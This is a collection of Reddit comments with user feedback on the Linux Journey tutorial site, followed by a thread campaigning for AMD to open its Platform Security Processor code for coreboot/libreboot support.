What is the licence of your site ? Do you plan publishing its source code under AGPL or such ?
I love it - great job!
Some Question feedback: 

I clicked on subnetting to start with just to see the UI/UX. Some of the questions were confusing though. For example:

Q: What is used to represent a single private address to the Internet?
A: NAT

Feedback: This could be better worded because NAT is used to represent many private IP addresses behind one public IP address.

Q: What IP address is used to help increase the number of hosts that can connect to the Internet?
A: IPv6

Feedback: Again, the wording is confusing. IPv6 is not an IP address. I think you meant to say "Which IP address [version/scheme]..." or something similar.


Awesome website! I'm sure this will be one of the best tutorials out there for beginners once the typos and questions get nailed down. Thanks!
Hell yeah this is awesome. Please keep up the good work. I passed this onto a couple of low level guys that are trying to learn more linux/networking.
Awesome, congos on the great work. I'm sharing it like hell!
Awesome!
I love this! 
Looks very helpful!! Thank you very much!!!!!!
Excellent work! I'd suggest that there be a section on desktop environments and sub categories for that: game dev (Vulkan, etc), wine, VMs,  libre office, general dev (jetbrains, vim, sublime, etc)
https://linuxjourney.com/lesson/help-command  

Yeah, this isn't correct. IIRC `help` is a bash-specific thing for giving help info on bash's builtins (e.g. not ls, cat, and mv).
I think you really hit the nail in the head with that site. That's what Linux needs to gain popularity: a place where people are not distracted by their freedom of choice,  where can learn and understand the differences between distributions and tools.

Not having a main distribution, one must find a way to centralize the knowledge regarding the Linux kernel, tools and package managers. Aesthetics are really appealing to the new users, and finally, someone has made a great looking site without an out of focus picture of a hipster sipping coffee in Starbucks. Who needs that really? I also like the creative "achievement system" (Networking Nomad). Easily understood inside jokes for outsiders (more of these pls).

Consider releasing the lessons on GitHub, and encourage people to contribuite.
Perfect, have already shared this with some of my friends.
nice
Holy crap! The website looks fantastic. As a new user to linux, this website is a godsend!
Awesome, but It didn't proper work on my smartphone (Motorola Nexus 6).

Tried With Chrome & Firefox. In Desktop Modality it works fine but the responsive style change.

Hope I helped.

Greetings!
I would add a even more advanced text-fu section with some examples of awk sed or mmv just to grasp some of the possibilities of the linux shell.

Is there a section mentioning for-loops, one of the big selling points of Linux was the possibility of saving time with recursive tasks at the University. 

At the boot section there are no exercises, it would be nice to add some gif showing the boot loading process, grub etc.

Also is there no general search within the site?
You should add a chapter on screen. 
Nicely done. I'm a long time Linux admin but now have to get fully certified for work. I use Linux Academy to brush up on stuff but your site has a lot of nice, quick info. Well done.
What language was the site made in? Looks and works great man.

Edit: Also, thank you **so much** for making this, as an extreme linux noob, I had a hard time finding a well made, English, centralized source for learning how to use linux.

Keep up the good work
Great! Lots of good info for everyone.
[deleted]
I love it..very nice
On a smart phone the side bar doesn't show up right
is this all from scratch? It reminds me of Codecademy. 
It is beautiful, and I cannot wait to use it to broaden my linux ability. 

Looks great!  As someone else posted it needs a little work for mobile devices.  I look forward to recommending to others.  +/u/dogetipbot 50 doge verify
The design and look of it alone makes me excited to start reading it when I go to work. 
Huge codeacademy vibe, which I think is a good thing. 
Can you Open source this? I would love to send you pull requests!
PLEASE don't change your site later to a you-get-something-for-free-and-please-pay-for-the-rest model because it looks very awesome! :)
[deleted]
Great! I'm waiting for the advanced mode. find -name /path is about what I know by heart, as well as grep -i, but it's the advanced options that kill me. 

We all know that manpages are not exactly state of the art when it comes to UX, so there's certainly opportunity for you. 

This looks a bit like readthedocs, is it that? Are you planning on collaborating with anybody, or will this be a standalone documentation of your own journey?
Looks great and appears to be a good resource. I found it 5 minutes ago and it's already helped me.
Oh wow! Fantastic site right here. Even has exercises at the end of chapters!
This is pretty cool! Awesome work.
Something I have been struggling with the past few days is uninstalling packages. One that I've compiled from source and a printer driver I installed with bash. 

I haven't had a ton of time to research it, but it seems that there isn't much info on it.
Could you put the

     <div class="thumbnail thumbnail-border fade">

inside the <a> please?
great!!
The homepage, unfortunately, has one little bug in safari for the iPhone 5S. Not sure if it's fixable, but the text "Learn the ways of Linux-fu for free" is cut off by the next section.
Man... I wish I had this when I started learning Linux. Congratulations it looks very promising.
Great-looking site! Did you create the icons yourself? I have no idea how to create graphics that look presentable. This really holds up projects I want to release.
This is excellent mate. I've actually been looking for a nice 'beginners guide' to init and this was just what I needed to get me started. It has the perfect amount of info to help me understand about the various inits and to now know what to Google sensibly to find what I need -  instead of randomly goggling phrases hoping for the best. 
The left hand menu isn't mobile friendly either - at least not on Chrome Beta on my android 
While the terminal crash course is great, the vast majority of  computer users will run a mile when they see it.  I'd actually make that a subsection for advanced users and instead go over GUI equivalent tools beforehand.
Suggestion: Move the "Home" button to the top-left, and add "Previous" and "Next". Or perhaps

[ Previous | Home | Next ]

(only... buttons, not text menu)

This is a fantastic resource I'm going to share with anyone and everyone who is just getting started with Linux. And I definitely don't consider myself an expert - I'm learning some things from you. Many thanks for an awesome resource.

If you ever need a mirror, or if you get too many hits for your hosting, please let me know. I'm http://PanamaCityPC.com/ and I've hosted the [Simutrans](http://simutrans.com/) community for basically a decade - I have experience hosting site that need a large amount of bandwidth. I'd be glad to volunteer hosting for you if you ever need. Just let me know. :)
Some thinks are broken on the mobile site (div margins, spacing), but other than that it looks pretty good. There's a lot of useful information here and I think it'll take off. 

Depending on which browser you use to develop, in chrome, if you hit f12, it opens up the developer window and you can select which device template to use for your viewing pane. I'm working on a project at the moment that aims to be compatible for all screen sizes and this has been one of the most useful workflow tools for me. 

Good luck on the site, it's a valuable resource for everyone, not just noobs.
In my humble opinion, the history part is kind of like waste of time and energy, I think that if something good has codecademy is that it goes straight to the point, few blah blah blah and more practice 
Wow I made a very similar site (worldoflinux.org) a few months ago and got super negative feedback from this sub. Maybe it's the layout?
This is absolutely amazing. Thank you so much for your work. 
You should do "Text-Fu" and then "Text-Fu 2: Electric Textaloo" for the two "Text-Fu" sections. :)
Great site. I think allowing contributions from the community would be huge! This could grow into the go-to place for info.
https://linuxjourney.com/lesson/network-interfaces

Maybe you could change it to ip instead of ifconfig? http://serverfault.com/questions/458628/should-i-quit-using-ifconfig
~~Correction~~ for subnetting-cheats: 
https://linuxjourney.com/lesson/subnetting-cheats

>What is the binary conversion of 123?

My answer: 1111011

It's flagged as incorrect?
Great :)

Just looked quickly, but design seems great ! Seems simple and easy to navigate, but with cool info and exercises !

As the site grows, my only suggestion is to not "complicate" things. Better not try to be "an all and everything about linux site".

Congrats, sincerely liked it !
This looks great! I'm going to give this site a serious go to really learn Linux. Thanks!
Awesome work, totally blown away.
First of all I'd like to say that this is a fantastic resource for learning Linux.  It's beautifully designed, simply explained, and goes to a fairly high level; a combination that many resources for Linux just don't have.

With that being said, I did do the first two courses just to see what they were like and I do have a couple of suggestions:

**GETTING STARTED**

a) Really stress in the section about choosing a Linux distribution that in the end, it doesn't matter what you choose.  Frankly for many users the biggest differences end up being the DE/WM (which can be changed) and the package manager.  Far too often new Linux users will post questions in forums or on social media asking which distribution they pick (or worse, which is "the best") and it turns into a flame war.  I can't recommend enough that you stress that it's your own preference in the end

b) I would give a bit more of a warning about Gentoo and Arch (particularly Arch - you at least mentioned that Gentoo is more of a challenge).  Neither is for the faint of heart)

**COMMAND LINE**

a) This one is less of an opion thing and more of a factual thing.  Don't say that touch creates a file, that's not its core purpose.  Touch updates a file (you're "touching" that location on the disk).  So if you touch a file that already exists the last modified date will change.  If you touch a file that does not exist, it has to create the file in order to set the last modified date so it does that.

I'll keep going through the tutorials and if I spot something I'll use the contact email at the bottom to let you know.  Like I said though, this is a fantastic resource.  I plan to direct a couple of my friends to this.  Thanks for making it!

Edit: formatting

Edit 2: formatting again - I'm a bit new at this
[deleted]
That's really nice! I gave it a quick once-over and really, REALLY like it.  I have friends I'll be recommending the site to.  I'm curious to use it as almost a CodeAcademy-like resource to pick up on skills I might not have, or brush up on things I can't quite remember.

Think you see yourself making an "advanced" version of the site that covers material that is maybe present for certifications? Like my Linux Certified System Administrator training goes over run levels, differences between GRUB versions, the file system structure, etc.  That'd be really useful and would turn it from a fun hobby website into something you can potentially monetize since it follows the easy-to-use format of CodeAcademy that is already popular.
Forgive me if this is covered: are you considering a "religious wars you may encounter" page?

Trying to give an objectively neutral intro to the, sometimes, heated debates over these may give your audience at least a fighting chance to understand WHY they are so inflammatory. I found the differing, often times belligerent, opinions confusing af while trying to answer "which $blah should I use?"

I do not mean to try to pick any side of these, but so that new linux users will know why they are getting downvoted into oblivion or beaten about the head just for asking a "simple"  question. I've seen too many threads, discussions, or legitimately innocent questions met with snarling and gnashing of teeth...

In case you have not yet encountered some:
Shells: bash, ksh, $latest_one
Editors: vim/emacs/nano/pico
Distros and derivatives 
Package managers
systemd/init/upstart
Config/automation: puppet, cfengine, saltstack, ansible


Amazing, great work!
Thank you!!!!
I'm in a Skype chat with friends and non SA coworkers and mentioned this site, they're all over it! Good stuff
I would re-order the topics taking better account for building on almost no knowledge, then building on the knowledge they gain. Getting into CLI early can be very intimidating.
Is it necessary to tell Linux newbies about UNIX and stuff from decades ago? It's not really relevant for knowing how to use Linux.
It would be more cool if there was some kind navigation bar or something like that. Of course for convenience :)
Spectacular. Can't wait to help with translations ;)
Very nice!  Bookmarked for sure.
Oh, nice. Just found this...

http://www.omgubuntu.co.uk/2016/06/learn-linux-great-new-website-linux-journey
You OP should seriously think of donation button.
Great  look and content: the two make your job outstanding.

In the rpm world there are two big boys: one is Red Hat, the other you missed is  SUSE with SUSE Enterprise Linux on commercial side and the community driven openSUSE Leap and Tumbleweed. 

thumbs up!!
Bloody marvellous, I can't believe that's just a hobby site.
If it hasn't been said, the shortcut for Ubuntu on this [page](https://linuxjourney.com/lesson/ubuntu) is broken.
> Arch is a lightweight and flexible Linux distribution driven 100% by the community. Similar to Debian, Arch uses a rolling release model so incremental updates eventually become the Stable release. You really need to get your hands dirty to understand the system and its functions, but in turn you get complete and total control of your system.

This really isn't accurate. Arch isn't "lightweight;" in fact, it's rather bloated because the maintainers rarely split packages. Whereas Debian has separate `-dev` packages to include header files (needed for compiling things), Arch just has those thrown in with the standard packages even though 99% of users will never need them. The only thing "lightweight" about Arch is its minimal installation, but you can achieve a minimal installation with *any* distro, for example using `debootstrap` for Debian (and its derivatives).

Hell, lemme just link to [this mailing list post](https://lists.archlinux.org/pipermail/arch-general/2015-July/039443.html). It explains things pretty well.
In AMD’s AMA [here](https://www.reddit.com/r/Amd/comments/5x4hxu/we_are_amd_creators_of_athlon_radeon_and_other/), they say they will seriously consider releasing their Platform Security Processor (PSP) source code. This is their equivalent of the Intel Management Engine and would make AMD processors compatible with coreboot/libreboot.

This would be massive. It would make it possible to have a truly open-source machine, with all the security and privacy benefits that entails. At the moment secure boot relies primarily on aging Intel processors from nearly a decade ago.

In 2011, AMD began supporting coreboot, but stopped in 2013 and introduced the PSP. Why? Because they didn’t think it was economically worthwhile.

**Don’t let that happen again!** Let’s tell AMD there is demand for this. Get into that thread and comment. And – more importantly – message them! If you’re reading this after the AMA has ended, contact them anyway!

[AMD’s Twitter](https://twitter.com/amd?lang=en)

[AMD’s Forums](https://community.amd.com/places?filterID=all~objecttype~space)

[AMD’s contact page](https://www.amd.com/en-us/who-we-are/contact) (You can find details on AMD in your country) 

You can also reach them on Facebook.

EDIT: Some people are saying they want to call. I think that's great - do it! The best number I have found (so far) for North America is (877) 284-1566. Customer service, but they're able to take and pass on feedback at least. If anyone has other country numbers or a better one for North America, let me know and I can add them.

EDIT 2: It’s working! This has ‘CEO level attention’. See update post [here](https://www.reddit.com/r/linux/comments/5xvn4i/update_corebootlibreboot_on_amd_has_ceo_level/). Keep getting in touch!
AMD, if you do that, I will buy it. Full stop.

edit: Thanks stranger! I'm glad to see I'm capturing the general sentiment. I don't have any (?other) social media accounts, so please share that with AMD if you agree!
Let's just hope they realize what a huge fucking win this would be.

If they do it, Intel has to answer by doing it as well... They can no longer afford not to, as that would make AMD the only game in town for security critical applications and the security conscious crowd in general.... Which means big bucks!

Get hyped!
[deleted]
Even snowden twitted about that nice
If *any* CPU without these odious "management extensions" were available and it were merely sufficient to my needs - it would win my purchase every time.

Uh, not exactly. [Here's the response to that question:](https://www.reddit.com/r/Amd/comments/5x4hxu/we_are_amd_creators_of_athlon_radeon_and_other/def6hwr/) 

> Thanks for the inquiry. Currently we do not have plans to release source code but you make a good argument for reasons to do so. We will evaluate and find a way to work with security vendors and the community to everyone's benefit.

That's a very non-commital corporate PR response. The "work with security vendors and the community to everyon's benefit" part can be interpreted in a ton of different ways, especially if "everyone" includes state governments, AMD corporate customers, etc.

While I would like to see this happen, you can bet that we're not getting the full story as to why the PSP was introduced.
**FOLKS** don't just post here! Take it to Twitter, their Forums and the others! Posting here, AMD WILL NOT SEE IT. Make it PUBLIC and say your bit!
AMD used release the AEGIS code based in the past for coreboot iirc.

Adding official Coreboot support would be simply incredible.

I've [tweeted at AMD](https://twitter.com/szim92/status/837471011398373376) about it, but I'll see what else I can do.

It really would fit in quite well with the current direction of the company, with projects like AMDGPU, Vulkan, and GPUOpen having major impacts on the market.
I'd be super up for Libreboot support. I'll probably be upgrading my CPU (and also my Mobo) relatively soon,
and I'd definitely go AMD if it meant I could run an entirely FOSS system. Hopefully they'll also make their
GPU firmware FOSS at some point too.
And blow the lid off whatever alphabet agency backdoor code is in there? Fat chance.
From AMD's contact page:

"AMD believes that what a company stands for is as important as what it produces."

Let's start standing for trust.  Real trust.
xx COMMENT OVERWRITTEN xx
Can I ask what the differences are between core and libreboot?
Contacted them, and hopefully it will make a difference.  I would definitely switch to AMD if they made such an effort to support openness.
There's also a [message](https://www.reddit.com/r/Amd/comments/5x4hxu/we_are_amd_creators_of_athlon_radeon_and_other/def6ubd/) in the AMA where it is suggested to AMD that releasing the specs of binary ABI would be enough. What do you think about this option?
If AMD supports libreboot, I'll replace my Intel with a Ryzen immediately
I will bring this to the attention of the IP present in the PSP code.
I pledge to buy a new gaming laptop with an AMD chip for my Linux Software based GPU
I will switch to amd as fast as possible if they do this.
That is massive stuff for creating healthy hardware environment. I've been AMD CPU user for 15 years now. And watching  their cool open source efforts makes it worth it.
I have never bought a PC for myself, but AMD, if you do this, I will go out and build one. Hell, I'll even use an AMD graphics card for good measure!
Completely serious, if Coreboot support is present I will buy a high end Ryzen for my new gaming rig, later this year.
Just did my part and messaged AMD directly via their contact page! 

AMD could really have an army of loyal linux users who build nothing but AMD systems top to bottom. Myself included.
@ /u/jiggunjer, /u/homelesspieceofshit, & /u/LgDog 

If you're still interested to learn what AMD's PSP is, how Coreboot will help, and why this is so important to everyone, I wrote up an explanation here.

https://www.reddit.com/r/Amd/comments/5x4hxu/we_are_amd_creators_of_athlon_radeon_and_other/defi2oq/

Hope you find it helpful. :)
i hope we will see some new amd laptops 
YES, please! 
if so, I'll switch to AMD for the foreseeable future.
I just wanted to say one thing. I bought a PC a few months ago with AMD FX-8320E CPU. A new one. In 2017.

Why I did that? To avoid Intel backdoors. I want to be in control of my computer. After doing research, I realized that this particular CPU doesn't have PSP anti-feature. I did consider other options too like buying Raspberry Pi instead. My old computer was worse than that, even.

If you decide to release source code of PSP, I will gladly buy the new AMD CPU and recommend it to others.
I just built a pc two months ago with Intel and Nvidia.  I will seriously sell it, and take the loss, to build something with Ryzen if AMD does this. 
Ryzen is a prime example of optimizing a product to target the largest common denominator.  Assuming everyone at AMD has been heavily focused on optimizing parameters of their product to suit the largest target market at the smallest cost (both during the development and transition into marketing of Ryzen), I hope this little request for Libreboot support isn't eighty-sixed as marginal gains.

Libreboot is less about marginal gains and more of an investment into the future of freedom in computing.

While it is possible for sustained success with little regard for digital freedoms (a marginal concern), and profit incentives seem to oppose investment in digital rights (an unpopular, or more correctly, a lesser known factor), keep in mind that an element of a working business model may yet to be properly exploited in practice.

Just another parameter to consider.
This can be massive! More and more people want and need computers they can trust. And more and more manufacturers and oem want to deliver devices like this. This will create massive headlines and could seriously boost AMD processor sales. Go!
It would be a nice move
+1, buying AMD only if this becomes a thing
I'll be done with Intel if they do this. No question. No second thought.
More Open Source + Team Red = Happy Me
If they do this, it would AMD all day every day everywhere in my house. 
AMD, I'm an MSP sysadmin, and full stop, I'd buy Ryzen / Naples and put it in my clients' servers and desktops if you did this - and buy it for a laptop, too.
Intel in 14/15 of our machines. If you go libreboot I'll never buy Intel again.
This would get me to purchase an AMD laptop, an AMD server/workstation, and an AMD desktop.
I am in!
Since this reached /r/all can someone put a simple ELI5? I'm a programmer and have no idea what this is about.
This would be great, do want!
I got an FX-8370E this last year becasue not had the PSP. I really hope that they release the source code (or at least drop it from Ryzen consumer CPUs)
If they do this, next computers me and people close to me buy will have AMD processors, for sure.
This would be great
That's the only way I would continue to be an AMD customer. I have been considering switching to ARM since I learned about PSP. But if they change their tune, I'd be really happy to stay with AMD.

FTR, I've been a customer since 2006: Turion64 in an Acer laptop, then went on to assemble and update my own desktop PCs, always AMD-based.
Is there a forum link for AMD's forum? I can not find any thread. 
This may prevent a possible dystopian future,
and would be a very humane and brave move.
Does anyone actually use PSP for anything anyway? I've never heard it brought up in an IT context or anything.
You can email them: http://emailcustomercare.amd.com/iframe.aspx?language=EN
Releasing the source code only works if they can do reproducible builds.  I'm pretty sure the binaries have to be signed by AMD before they can run.  So, releasing the source code just means we can verify what the PSP is doing.  Without a reproducible build we can't even do that.
No demand here. I'm ignorant of PSP and coreboot. 
> would make AMD processors compatible with coreboot/libreboot.

Wait I thought this was baked into hardware irreversibly and couldn't be disabled. Could someone ELI5 ?
[I'll just leave that here.](https://decentralize.today/uncorrectable-freedom-and-security-issues-on-x86-platforms-2e6220fa07ed#.e2wtvze6n)
Currently have my finger on the trigger for new acquisitions of systems at work.

Make us happy AMD, I'll return the favor
It will be an IMMEDIATE purchase. There IS incredibly high demand for these products
If AMD opened their code to Coreboot, I would only buy AMD from here out. Period. For me and all my clients.
@ AMD if you do this. count me in for at least one perhaps two cup's. And i know a couple of friends queueing in line if this happens. i absolutely hate IME on intel chips. i understand the need for enterprise system and remote management but i would decline if given the choice. OpenSource this part and make a lot of people happy. And to be frank if you do this i my only response would be.
"Please take my $$"
Wouldn't releasing the source code be a security risk?

 I have no tech knowledge of these things, so if someone could ELI5 why this is a noob question that'd be great.
Oh my lord if AMD does this, holy shit. Time to completely switch!
I'm a bot, *bleep*, *bloop*. Someone has linked to this thread from another place on reddit:

- [/r/hackernews] [AMD to consider coreboot\/Libreboot support for Ryzen](https://np.reddit.com/r/hackernews/comments/5xa4of/amd_to_consider_corebootlibreboot_support_for/)

- [/r/italyinformatica] [AMD to consider Coreboot\/Libreboot support. Contact AMD!!! Let them know there is demand. (x-post r\/linux)](https://np.reddit.com/r/ItalyInformatica/comments/5x9ccp/amd_to_consider_corebootlibreboot_support_contact/)

[](#footer)*^(If you follow any of the above links, please respect the rules of reddit and don't vote in the other threads.) ^\([Info](/r/TotesMessenger) ^/ ^[Contact](/message/compose?to=/r/TotesMessenger))*

[](#bot)
I would also like non-shitty graphics drivers. I bought a $300 card in mid-2014, still shite support. I hate nvidia the company, wanted to vote with my dollar, but my next card won't be an AMD if the drivers continue to suck. The open source driver can't even play some mp4 videos properly on my fairly vanilla setup.
OK everyone, update to my last post [here](https://www.reddit.com/r/linux/comments/5x5xl3/amd_to_consider_corebootlibreboot_support_contact/) about the possibility of AMD open sourcing/releasing the PSP (Platform Security Processor) which could allow Coreboot/Libreboot support. Back in the [original AMA](https://www.reddit.com/r/Amd/comments/5x4hxu/we_are_amd_creators_of_athlon_radeon_and_other/), u/AMD_james (Product Manager in CPU Business Development) commented on this again in the last 2 hours. [Full comment](https://www.reddit.com/r/Amd/comments/5x4hxu/we_are_amd_creators_of_athlon_radeon_and_other/dekwva9/?context=3): 


>Thanks for the feedback. Please believe me that this has CEO level attention and AMD is investigating the steps and resources necessary to support this. It is not the work of a minute, so please bear with us as we define what we can do. 


Just to reiterate, this is **so important** for free, secure and open source computing. And enough people contacted AMD that they took notice. No actual change yet – but let’s keep letting them know how much we want it, and that it could be a major boost for AMD too.


So, in the next few days/weeks/months - **keep contacting AMD**! Don’t let them forget and don’t let the FOSS and security communities forget. This is a huge opportunity and one that might not come again.


u/AMD_james is of course right that this will take a little time. So as we wait, don’t get mad that an open source PSP isn’t here yet. Instead, let’s just keep making it clear that we are grateful that they are looking into this and that if/when it does arrive, they will have a *lot* of dedicated customers and supporters.


Contact details below, again:


[AMD’s Twitter](https://twitter.com/amd?lang=en)

[AMD’s Forums](https://community.amd.com/places?filterID=all~objecttype~space)

[AMD’s contact page](https://www.amd.com/en-us/who-we-are/contact) (You can find details on AMD in your country) 

Best number for North America: (877) 284-1566

You can also reach them on Facebook.

EDIT: One other possibility – contact any media outlets you think might be interested. The more people this reaches, the better our chances.
I'm **very** surprised /u/AMD_James responded to *yet another* PSP related comment. It'd be far easier for them to just stay silent and hope that we all forget about this and go away.

The fact that they're still engaging with us a hopeful sign indeed. Though it *could* just be coddling as well...

I sure as hell hope they follow through on this. It'd be a slam dunk for them financially if they do.
If this happens, I will only buy AMD in the future. And since I am basically responsible for the PC builds of family and friends, they'll go AMD as well.
> So, in the next few days/weeks/months - keep contacting AMD! Don’t let them forget and don’t let the FOSS and security communities forget. This is a huge opportunity and one that might not come again.

That would indeed be important. If the actual decisions are made after many weeks from now, we don't want the discussion inside AMD be like this:

– So, there was this suggestion to open source the PSP firmware. Is there still interest for something like this among our customers?

– Well, there was a raging initial interest but it seems to have cooled down.

– All right, that one is probably not worth bothering with after all. Let's move to the next topic.
Also, we don't need all of PSP. PSP can stay closed source if they like, they could just make it user-flashable and make an open source stub that only does the hardware initialisation without enabling the, uhm, "enterprise" functionality.
This is huge. Intel's Media Engine/Active Management Technology are basically a rootkit inside the CPU, and AMD's PSP is no better. (Basically just their brand name for the same thing.) Having it open source would mean we might finally be able to start trusting our CPUs again.

Don't let them think we've lost interest. This needs to be big news.
Do you want my money AMD.  Because this is how you get my money. 
Absolutely exciting! Are there any ideas/samples to make this more into a mini-campaign? Like should we bombard them with #LibreAMD, #MakeAMDLibre or some other clever hashtag? (not saying these are clever ha!) What other Libre/Open Source projects should we reach out to asking for them to voice their support (would FSF be into this?), etc.?
Is it possible we'll start seeing AMD on ThinkPad X series laptops in the future? I've always liked ThinkPads the best but if AMD accommodates coreboot, I'm done with Intel.
[deleted]
That is simply fantastic to hear. Hopefully it pans out 😀

>EDIT: One other possibility – contact any media outlets you think might be interested. The more people this reaches, the better our chances.

;)

I'm not directly involved in our Ryzen coverage, but I definitely will bring it up with [Daniel](https://twitter.com/XDAGarwynn) and the rest of the team.

If you have any suggestions as to what we can do to support this endeavor, let me know. 
/u/1n5aN1aC thank you for posting your question to get the ball rolling!
How much do you want to bet that if this gains traction, AMD is going to receive a National Security Letter from a secret court demanding they cease work on this project? 

Regardless, I wrote them an email supporting this idea.
Right now I'm disputing upgrading to an R5 for my Linux gaming machine. It would be good for when I compile things (currently have a Pentium G3258 overclocked) but I wouldn't see a huge difference in single threaded (for when I game).

If this happens, then it confirms my purchase. 100%.

I'm OK with running closed source software so long as it wouldn't have access to any data I don't explicitly give it (and doesn't do weird things like use the networking loads). Hence why I don't mind running a closed source game, but I'd prefer to have my OS be open source.

This is huge news! As OP said, don't be impatient, and certainly don't harass AMD about it. But make sure they know we're still here, and tell everyone about it. Pass the word on, let everyone know how big of a deal this is.

The only issue is if governments get in AMD's way. Wouldn't be too surprised if the NSA gave AMD a call about their business strategies.
If AMD opens their PSP code I will buy their processors instead so I don't have to worry about IME.
I had been hoping for some time that the community's obvious dissatisfaction with opaque binary blobs in general, and Intel's intent on taking control (out of the hands of the owners/possessors specifically) had already been on AMD's radar.

AMD is already the least bad of the major AMD64 architecture vendors, we just need them to decide to compete by doing the opposite of what Intel is doing.

Bear in mind that AMD is going to need to be able to issue microcode updates to correct problems in shipped chips lest they have another debacle like the Pentium FDIV bug so many years ago. As far as we know these microcode updates will probably need to be cryptographically signed, but they're less than 4k bytes per processor model and freely redistributable.

I wonder how big of a boon this would be for security experts?
Can someone ELI5? What does this mean?
I'd be an AMD customer for a very long time if this happened
YES PLEASE. I've already permanently switched to AMD from NVidia with graphics because of amdgpu. If this happens, I will switch from Intel with my CPU as well. I would love to have a powerful, secure, open, and trustworthy computer that is fully supported by all software!
I said it once before, and I'll say it again... If this happens, Intel will either follow suite, or become completely irrelevant for security conscious users and security critical applications. All at a killer price.

That said..

<shitpost>PLZ STOP IT AMD!! I CAN ONLY GET SO ERECT!!!!</shitpost>
Please oh please, for goodness' sake - at least one decent laptop CPU.

I think FOSS should be the core of AMD's strategy.  Their market cap is 1/10 of what Intel's is -- how else are they going to compete? By being almost as good as Intel but a bit cheaper? They'll never get ahead that way.  How about by being the only free, safe and open platform.  They should team up with SteamOS & make more of an effort in the Linux space and open source their drivers for the ATI stuff.
I hate to rain on the parade.  While I 100% support this cause, it is only one chip that can be rooted on a motherboard.  Still, its a start.
> You can also reach them on Facebook.

Coreboot/Libreboot, open source system, super FOSS drivers... for browsing FB.
Hopefully not only is AMD looking into it, but they are actually testing it. PSP support = I'm sure lots of people in this thread would instantly switch.
PLEASE RELEASE THE VULKAN DRIVER AMD!!!!!!!!
I will drop Intel like a rock and never look back if AMD did this, even considering their usual performance, that would be a non-factor.
If this becomes a reality, I'm buying a good chunk of AMD stock and switching out every Intel chip I have for AMD.

Really hope this happens.
Hopefully Libreboot will be able to boot at more than 2400MHz with 4 sticks of RAM, since all the official BIOSes seem to find this too difficult to achieve.
This, exactly this is why i want to go amd dor my next upgrade,these people actually care about the community. Unlike someone else in santa clara 
Coreboot support would be a major buying argument for me.
Dear AMD:

If you include proper coreboot and libreboot support, my next upgrade will be Ryzen. Period. I'm running an i7 and I would like to get out of the hell that is the ME.
Does anyone know if this will extend to older CPUs such as FX series, or even Phenom?
If this were the case, all of my devices would be switched to AMD, no question about it.
I'd like to add that all the arguments for the release of the psp source code are also valid for the gpu driver blobs. 
HOLY SHEET JESUS

bob sponge brain scene
would replace all my rackmount machines as soon as support was stable for this
https://vimeo.com/5168045
Videos in this thread:

[Watch Playlist &#9654;](http://subtletv.com/_r5xvn4i?feature=playlist&nline=1)

VIDEO|COMMENT
-|-
[CPU Backdoors Could Allow Government Spying](http://www.youtube.com/watch?v=wnt7OK8OPYU)|[+3](https://www.reddit.com/r/linux/comments/5xvn4i/_/deltyem?context=10#deltyem) - Also @  ,   &    I made a post explaining it here.   There is also this video that explains why it's important.
[GOTTA BOOT FAST - Booting with Libreboot and an SDD (Thinkpad x200 and t420)](http://www.youtube.com/watch?v=3XAW3vv1_18&t=190s)|[+3](https://www.reddit.com/r/linux/comments/5xvn4i/_/delbl4a?context=10#delbl4a) - I am not complaining, but I watched this video and it looks like it took about 6.5 seconds for the ThinkPad x200 to get to GRUB (from button press to GRUB appearing). On my ProBook 4730s with stock BIOS it takes about 3.5 seconds.  Update: Okay it's ...
[Trusted Computing](http://www.vimeo.com/5168045)|[+1](https://www.reddit.com/r/linux/comments/5xvn4i/_/delzsir?context=10#delzsir) - http://www.vimeo.com/5168045
I'm a bot working hard to help Redditors find related videos to watch. I'll keep this updated as long as I can.
***
[Play All](http://subtletv.com/_r5xvn4i?feature=playlist&ftrlnk=1) | [Info](https://np.reddit.com/r/SubtleTV/wiki/mentioned_videos) | Get me on [Chrome](https://chrome.google.com/webstore/detail/mentioned-videos-for-redd/fiimkmdalmgffhibfdjnhljpnigcmohf) / [Firefox](https://addons.mozilla.org/en-US/firefox/addon/mentioned-videos-for-reddit)
Was waiting for Ryzen to hit the market. Gonna make Ryzen PC build this year and this is another good message, thank you AMD!
[thread on amd forum - requires signup](https://community.amd.com/message/2784219)
Does anyone know what are the good numbers of people in the UK / Europe? I see a number of numbers on AMD's contact page but am unsure which is the best one to use. 
How about the microcode? Any chance someday we can do open-source CPU arch improvements?
This is great news, but I'm still skeptical because I'm not sure the NSA would be happy about this.
I'm a bot, *bleep*, *bloop*. Someone has linked to this thread from another place on reddit:

- [/r/badbios] [UPDATE: Coreboot\/Libreboot on AMD has ‘CEO Level Attention’ and AMD is investigating how to go about support. Contacting AMD is having an impact!! Don’t give up\/forget! • r\/linux](https://np.reddit.com/r/badBIOS/comments/5zuepk/update_corebootlibreboot_on_amd_has_ceo_level/)

- [/r/libreboot] [UPDATE: Coreboot\/Libreboot on AMD has ‘CEO Level Attention’ and AMD is investigating how to go about support. Contacting AMD is having an impact!! Don’t give up\/forget! • r\/linux](https://np.reddit.com/r/libreboot/comments/5xvrrw/update_corebootlibreboot_on_amd_has_ceo_level/)

[](#footer)*^(If you follow any of the above links, please respect the rules of reddit and don't vote in the other threads.) ^\([Info](/r/TotesMessenger) ^/ ^[Contact](/message/compose?to=/r/TotesMessenger))*

[](#bot)
[deleted]
Woot Woot!

In a way I hope they don't, because that would force me to spend all my savings on libre AMD products :D
I will basically buy nothing else if AMD goes libre. Software freedom is especially important now with the CIA basically gone rogue (again)
I am not complaining, but I watched [this video](https://youtu.be/3XAW3vv1_18?t=3m10s) and it looks like it took about 6.5 seconds for the ThinkPad x200 to get to GRUB (from button press to GRUB appearing). On my ProBook 4730s with stock BIOS it takes about 3.5 seconds.

Update: [Okay it's 4.5 seconds.](https://gfycat.com/EasyDigitalGuernseycow)
Don't want to be an asshole or something but i wonder where the confidence come from that the release of the code makes it possible to use Coreboot to initialize a Ryzen processor. I know that it was mentioned in the original question and it would be really weird if neither Robert Hallock nor James Prior would mention that releasing the code would be pointless to achieve that goal but is there any technical backing that this would work out as we all hope it would? What if they release the code but we still can't boot with Coreboot? I am not an expert in that field but i can't find an authority that would say so :/
If this is happening I will freakin sell my $3000 PC with NVIDIA GTX1080 and two DELL S2716DG with G-Sync and build myself an AMD Ryzen/AMD GPU machine. I am so excited I just can't hide it..... :D
It's a shame that libreboot is headed up by an intolerable SJW.
Can we get them to bring back ECC support for desktop processors too?
CHIP ETA??! cheers AMD
Twist: It's the CEO that is programming the solution.
The easiest way for them to contribute is to commit code directly to the projects that need attention.
Holy shit, did yall upvote the reddit AMA? There's 4k votes on both these threads.
tl;dr? What's core/libreboot?
Sweet
